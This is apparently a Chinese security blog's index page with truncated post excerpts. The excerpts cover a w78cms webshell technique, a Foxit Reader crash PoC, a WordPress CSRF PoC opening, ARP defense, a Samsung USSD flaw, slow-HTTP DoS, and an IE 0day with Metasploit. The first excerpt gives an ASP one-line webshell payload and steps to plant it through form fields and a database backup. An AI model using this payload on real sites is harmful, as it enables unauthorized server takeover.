w78cms后台拿shell

国外的一个站,采用了w78cms程序,貌似这程序还挺少见,发现貌似给人搞过了,百度下前人经验,他们是这样说的:

方法一:
前提条件:对方未修改数据库的默认地址
第一步:订购页面,直接在 产品名称,订购数量等输入一句话木马
<%eval request("ha")%>
第二步:备份数据库。数据库名为asp文件(这里注意:第一次备份的时候,程序会自动添加.MDB后缀,需要备份两次)注:会弹出要你登陆的框,不要管,再执行一下备份
第三步:一句话木马连接,上传shell

方法二:
前提条件:对方未修改EWEB的默认路径
第一步:直接在EWEB里上传[......]

Read more

福昕PDF浏览器英文版5.4.3.0920拒绝服务漏洞

福昕PDF浏览器应该是用得比较多的一个软件了,其最新英文版本存在一个除零的拒绝服务漏洞,可以使PDF浏览器崩溃。在虚拟机上验证之后确实如此,可惜好像被catch然后处理掉了,否则可能又是一个APT攻击载体,嘿嘿嘿。我发现中文版本没有出现这个问题,版本号才更新到4哦。

触发漏洞的PDF下载:
http://www.exploit-db.com/sploits/21645.pdf 

崩溃日志:

=========== [Start of CRASHLOG.TXT] =========
Foxit Reader caused an Integer Divide by Zero[……]

Read more

WordPress最新版本(3.4.2)的一个CSRF漏洞

在WordPress最新稳定版本3.4.2中,存在一个CSRF漏洞,如果管理员在登录博客的情况下,访问了包含下面内容的网页,将自动提交一个表单到目标博客,改变博客的RSS订阅链接,转向指定的地址。

测试环境:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL: 5.5.27

漏洞POC:

<body onload="javascript:document.forms[[......]

Read more

机房ARP攻击的一些防范方法

最近好像某个组织闹得很火,暗组什么的很多论坛啊,某些人的博客啊,听说都给改了首页。原因居然都是arp攻击,晕死人了,没有技术含量啊。最根本的原因还是国内的机房管理十分不规范造成的,这么老的攻击手段居然频频凑效,可以说很多机房的arp防护措施几乎没有,因为便宜,所以自然容易出问题的了。

针对ARP攻击的防治,常见的方法,主要三种作法:

1、利用ARP echo传送正确的ARP讯息:通过频繁地提醒正确的ARP对照表,来达到防治的效果;

2、利用绑定方式,固定ARP对照表不受外来影响:通过固定正确的ARP对照表,来达到防治的效果;

3、舍弃ARP协议,采用其它寻址协议:不[……]

Read more

三星Galaxy系列手机存在严重远程命令执行漏洞

三星系列手机最近被爆出存在远程命令执行漏洞,受影响的手机型号包括:

Galaxy S3, Galaxy S2, Galaxy Ace, Galaxy Beam, Galaxy S

此次受影响的是手机中的USSD命令,USSD的全名是Unstructured Supplementary Services Data,即非结构化补充数据业务。是一种基于GSM网络,可以提供综合性、交互式信息服务的数据业务! 很多手机中都有自定义的USSD命令,最广为人知的应该是查看手机串号的*#06#命令了。

过任意网站发送一条简单的USSD代码,或者通过NFC或是QR二维码,都能对三星Galaxy[……]

Read more

Centos一键安装VPN脚本

安装vpn是比较麻烦和头疼的事情,因此分享一个一键安装vpn脚本,Centos下测试通过:

yum remove -y pptpd ppp
iptables --flush POSTROUTING --table nat
iptables --flush FORWARD
rm -rf /etc/pptpd.conf
rm -rf /etc/ppp

wget http://poptop.sourceforge.net/yum/stable/packages/dkms-2.0.17.5-1.noarch.rpm  
wget http://poptop.sourceforge.n[......]

Read more

slowhttptest的几种慢攻击DOS原理

slowhttptest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者ddos的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击的攻击方式,包括slowlorisSlow HTTP POSTSlow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源。

slowhttptest

slowloris

slowloris的攻击方式说起来类似于基于HTTP协议的SYN Flood,但是影响的范围要小得多,比如同一个服务器上的两个Apac[……]

Read more

Blackhat 2012 USA 工具以及视频迅雷快传下载

从1997年成立以来,黑帽已经从一个在拉斯维加斯的单一的年度会议转变为在东京,阿姆斯特丹,拉斯维加斯,华盛顿每年一系列全球会议的盛世。它也成为一个精英安全研究员首映地点和最佳的安全培训,以找到自己的观众。

这份资料终于用服务器拖下来了,好大啊,14G,包括现场视频以及发布的一些工具等。都是好东西了,可以挑自己喜欢的看。

解压密码:nigesb.com
下载地址:
http://pan.baidu.com/share/link?shareid=324512&uk=2905237318

 

Blackhat 2012 USA 会议资料下载

Blackhat 2012 USA 已经结束了,官网放出了ppt和源代码等资料,不过确实太多了,看不过来,只能选有序有需要的下载了,地址:

http://www.blackhat.com/html/bh-us-12/bh-us-12-archives.html

当然除了ppt和paper之外,大家还是很想一睹国外大牛风采的,提供一个视频下载地址,纯HTTP的:

http://www.blackhat.com/html/bh-us-12/bh-us-12-archives.html

还有一个14G的资料,大但是可能比较清晰,下载地址为国外网盘的,我试试用服务器能不能拖下来[……]

Read more

IE 0day来袭,附Metasploit脚本

有老外发表了一篇文章,在追踪前几日被微软关闭的Nitol僵尸网络时,发现了一个IE的0day漏洞,并且发现了利用的exploit,影响范围为IE7-IE8。

作者一直在暗中监控几个被Nitro感染并且控制的服务器,14号早晨,突然发现一台意大利的服务器上多出了一个名为“/public/help”的文件夹,于是把它们全部打包下载了来分析。在使用一台完全补丁的XP+IE+FLASH电脑调试下载的文件的时候,发现居然有文件下载执行。一个新0day就这样被捡到了。。囧。

作者对整个漏洞的利用进行了一些分析:
http://eromang.zataz.com/2012/09/16/[……]

Read more